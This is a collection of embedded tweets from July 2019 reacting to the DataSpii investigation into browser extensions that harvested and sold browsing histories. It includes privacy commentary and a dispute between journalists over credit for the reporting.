.png "back to home page")
... Thousands of extensions ask for and get that access from users who have no reason to know that, say, the URLs they click on will be shared for "marketing" purposes, eventually finding their way to brokers like Nacho Analytics, who then sell the data to anyone who pays ...
— Jonathan Zittrain (@zittrain) July 18, 2019
”After we disclosed the leaks to browser makers, Google remotely deactivated seven extensions, and Mozilla did the same to two others” https://t.co/D2iD8dpJpV
— John Wilander (@johnwilander) July 18, 2019
Some fascinating technical detail from @dangoodin001 about the browser extensions that slurp up and share browsing data: https://t.co/lWW1KtNaYz.
— Jonathan Zittrain (@zittrain) July 18, 2019
What jumps out are the extensions's obfuscations of their activites, such as by waiting a couple weeks before sending telemetry back.
What makes this data useful -- saleable -- is not separable from what makes it invasive. This is a peek into a pervasive but hidden ecosystem. A duck's feet madly paddling beneath the surface, while all most see is it serenely gliding across a pond. Read the marketing: pic.twitter.com/Hy00Zk0aYA
— Jonathan Zittrain (@zittrain) July 18, 2019
Security researchers focus on Chrome extensions —but we found leaky ones for Firefox & Opera, too.
— Geoffrey A. Fowler (@geoffreyfowler) July 18, 2019
We did not find any for Safari. That could be the result of effort by Apple — or just be a sign how small its market share is among desktop browsers.https://t.co/Kx704CfJpi
This is a compelling account of data leakage through dodgy but popular browser extensions. To do a small useful task -- like letting you easily zoom in a picture on a web page -- an extension will ask for full permissions to read and modify everything you see as you surf. ... https://t.co/ny1XCXFnLT
— Jonathan Zittrain (@zittrain) July 18, 2019
From DrChrono, a medical records service, we saw the names of patients, doctors, and even medications. From another service, called Kareo, we saw patient names.https://t.co/qHs3vWEC7C Shocking! What’s your data worth?
— Timicoin/TimiDNA (@timicoin) July 18, 2019
DataSpii: The catastrophic data leak via browser extensions (Jul 18) https://t.co/xDR9Zydsfh TL;DR: be very careful about installing browser extensions, or face serious privacy/security risks. Attached pic: extensions that you probably don't want... (read article) /c @_cryptome_ pic.twitter.com/DZGPwCbnIK
— Matthijs R. Koot (@mrkoot) July 19, 2019
This is what's wrong with the internet economy:
— Shira Ovide (@ShiraOvide) July 18, 2019
There is no way that people who download a browser add-on to enlarge their photos are consenting in any real way to have their information sold to marketers. pic.twitter.com/Y7jCGao8cm
Time to look into your Chrome and Firefox extensions via @geoffreyfowler @washpostbiz https://t.co/nLsy8qv5cF
— Michelle Gaps (@michellegaps) July 18, 2019
The company's web site today has a splash screen crafted in response to @geoffreyfowler and @sam_jadali's worthy spadework. It's chef's-kiss level denial and counter-charge. "...an individual exploited our tool specifically to seek out security flaws in less-secure web sites." pic.twitter.com/b4rPwTXa8F
— Jonathan Zittrain (@zittrain) July 18, 2019
The writer has used “we” or “I” in numerous tweets from Thursday to give the same false narrative that his role was different than one of a journalist. I asked him to correct or clarify his story. A few hours later he tweeted this: 10/13https://t.co/oR8rk1pCzd
— Dan Goodin (@dangoodin001) July 19, 2019
I'll be quiet about this soon, I promise. But here's an example of people thinking the writer did more than simply spend a few weeks reporting a researchers findings. https://t.co/i3su9aPMXa
— Dan Goodin (@dangoodin001) July 19, 2019
My main story is:https://t.co/wztoSI6enE
— Dan Goodin (@dangoodin001) July 19, 2019
My technical deep-dive is:https://t.co/aOfMTbjusw
WaPo post is:https://t.co/8YQ0MrJ4Ed
It turns out a lot of private data ends up in a URL. Long, un-guessable URLs are ways of referring to private Google Drive or OneDrive docs. They contain record locators and passenger names for airline flights. And those extensions read it all and pass it along. pic.twitter.com/cOZ2JHWeBm
— Jonathan Zittrain (@zittrain) July 18, 2019
A colleague of mine, @dangoodin001, has deeply reported a story on browser extensions that spied on up to 4 million users. Of note, Blue Origin was caught up in the mess.https://t.co/uAfXUqsxFz
— Eric Berger (@SciGuySpace) July 18, 2019
We should NOT allow the internet to remain a giant personal-information sucking nightmare. @geoffreyfowler sheds light on the Web browser add-ons that watch everything you do online, for money. https://t.co/tnO1bq72cs
— Shira Ovide (@ShiraOvide) July 18, 2019
The core discovery in my column today comes from @sam_jadali, an independent researcher who spent half a year tracking and testing leaky extensions after finding some of his own clients’ data for sale.
— Geoffrey A. Fowler (@geoffreyfowler) July 18, 2019
Read his whole “DataSpii” report here: https://t.co/ngX8DFmF3C
That's right. "This isn't the same data you'd see from SpyFu, SEMrush, or ahrefs." Not household names. By design.
— Jonathan Zittrain (@zittrain) July 18, 2019
This system can't be patched or retrofitted. Its success depends on the lie of informed consent, on obscurity, and on dismissing invasive pieces as rounding errors.
DataSpii: The catastrophic data leak via browser extensions (SUMMARY) <oh my. Browser extension data leaks https://t.co/SgmRvQni12
— Privacy Matters (@PrivacyMatters) July 19, 2019
But 8 minutes later, he went on to tweet something that once again gives this false impression he helped arrive at the primary findings, rather than simply having the primary findings shared with him months after the researcher arrived at them. 11/13https://t.co/hO1Udeo9Fj
— Dan Goodin (@dangoodin001) July 19, 2019
[아스테크니카] DataSpii 추가정보: 어떻게 수집한 데이터를 숨겼고 들켰는가https://t.co/hIoCbW3F7z
— 라루얀 / 말썽쟁이 구운 경단 ? (@LaruYan) July 18, 2019
나쵸 애널리틱스에 전송되는 데이터는 Base64로 변환되고 압축되서 탐지를 방해. 설치 초기에는 개발사에 분석정보를 넘기는데 그쳤으나, 한달뒤 난독 JS 파일을 받아 수집한 웹 활동 이력을 넘김
There is a crucial element missing in the article below: how were the extensions able to execute remote code in their own context? By default, this not possible. (cc. @dangoodin001)https://t.co/SY6Jc7dTW4
— R. Hill (@gorhill) July 18, 2019
You may find my coverage interesting:https://t.co/wztoSI6enEhttps://t.co/aOfMTbjusw
— Dan Goodin (@dangoodin001) July 18, 2019
My browser, the spy: How extensions slurped up browsing histories from 4M users https://t.co/Rg5Iza8u6s
— Dan Goodin (@dangoodin001) July 18, 2019
Ars relates the story of 1 man's efforts to identify spyware that gathered browser histories from 4M users. It's about browser add-ons, which can "behave" for months before downloading the spyware. I don't use many, and am dumping the ones I use. #spywarehttps://t.co/u0THfcB6dR
— Jeff Duntemann (@JeffDuntemann) July 19, 2019
.@Techmeme updated the link to the DataSpii story to now feature @dangoodin001 and @arstechnica's story, rather than the misleading @washingtonpost piece, FYI https://t.co/w8CcKuqH8i pic.twitter.com/KugF7ifJut
— Emily Dreyfuss (@EmilyDreyfuss) July 19, 2019
For my OpSec friends, I wish there was a way I could translate this outstanding work for civilians. It's a cogent and well-researched report on personal data *theft*. What's worse, your data may well be inside the cache: https://t.co/Jq3W2gKvWm @dangoodin001
— Tom Henderson (@extremelabs) July 18, 2019
How web browser extensions slurped up browsing histories from 4 million users https://t.co/jttRQ15VY2 pic.twitter.com/BC9MdRFXLN
— Graham Cluley (@gcluley) July 19, 2019
Wow. @dangoodin001 did months of hard work on the browser extension data leak story and it seems like the WaPo totally misrepresented its version of events after parachuting in at the last minute. https://t.co/tD7Wj6EmIm https://t.co/uPY1LfZFyd
— Zack Whittaker (@zackwhittaker) July 19, 2019
These 6 popular browser extensions are selling your data https://t.co/8uIki4L90h
— The IoT Warehouse (@TheIotWarehouse) July 18, 2019
수백만 명의 Google 크롬 및 Firefox 확장 기능 사용자에게 데이터 누출 경고 https://t.co/8DFOM78wrI
— editoy (@editoy) July 20, 2019
• 이 페이로드에는 사용자의 탐색 데이터를 수집하여 개발자가 제어하는 서버로 보내는 축소된 JavaScript 파일이 포함되어 있습니다.
Cool new browser extension? Yeah, about that. Once again, if it's free, you're the product. Or rather your data is. https://t.co/d1DDodxKtf
— Buck Woody (@BuckWoodyMSFT) July 20, 2019
New report on browser extensions selling *highly* sensitive personal data on millions of users. EU authorities must immediately start to investigate the browser extension data industry.
— Wolfie Christl (@WolfieChristl) July 19, 2019
Report:https://t.co/wiuRUDEsyb
Articles:https://t.co/8b6Rjadtdqhttps://t.co/KNxqZIzm3b
My browser, the spy: How extensions slurped up browsing histories from 4M users https://t.co/Befw2iMxdX pic.twitter.com/slKatSGimf
— Aaron Parker (@stealthpuppy) July 19, 2019
It's almost as if removing as many useful features as possible from modern browsers and then pushing users to install random third-party extensions that aren't vetted at all to regain them is a really bad idea. Who would have thought?https://t.co/HJmY84c3sy
— byuu (@byuu_san) July 20, 2019
My browser, the spy: How extensions slurped up browsing histories from 4M users https://t.co/38xIpO5ngh pic.twitter.com/0DnAHRWlA6
— Rich Tehrani (@rtehrani) July 18, 2019
Be carefil with thos browser extensions... My browser, the spy: How extensions slurped up browsing histories from 4M users https://t.co/umrA0vN3F8
— Mikko Piippo (@mikkopiippo) July 20, 2019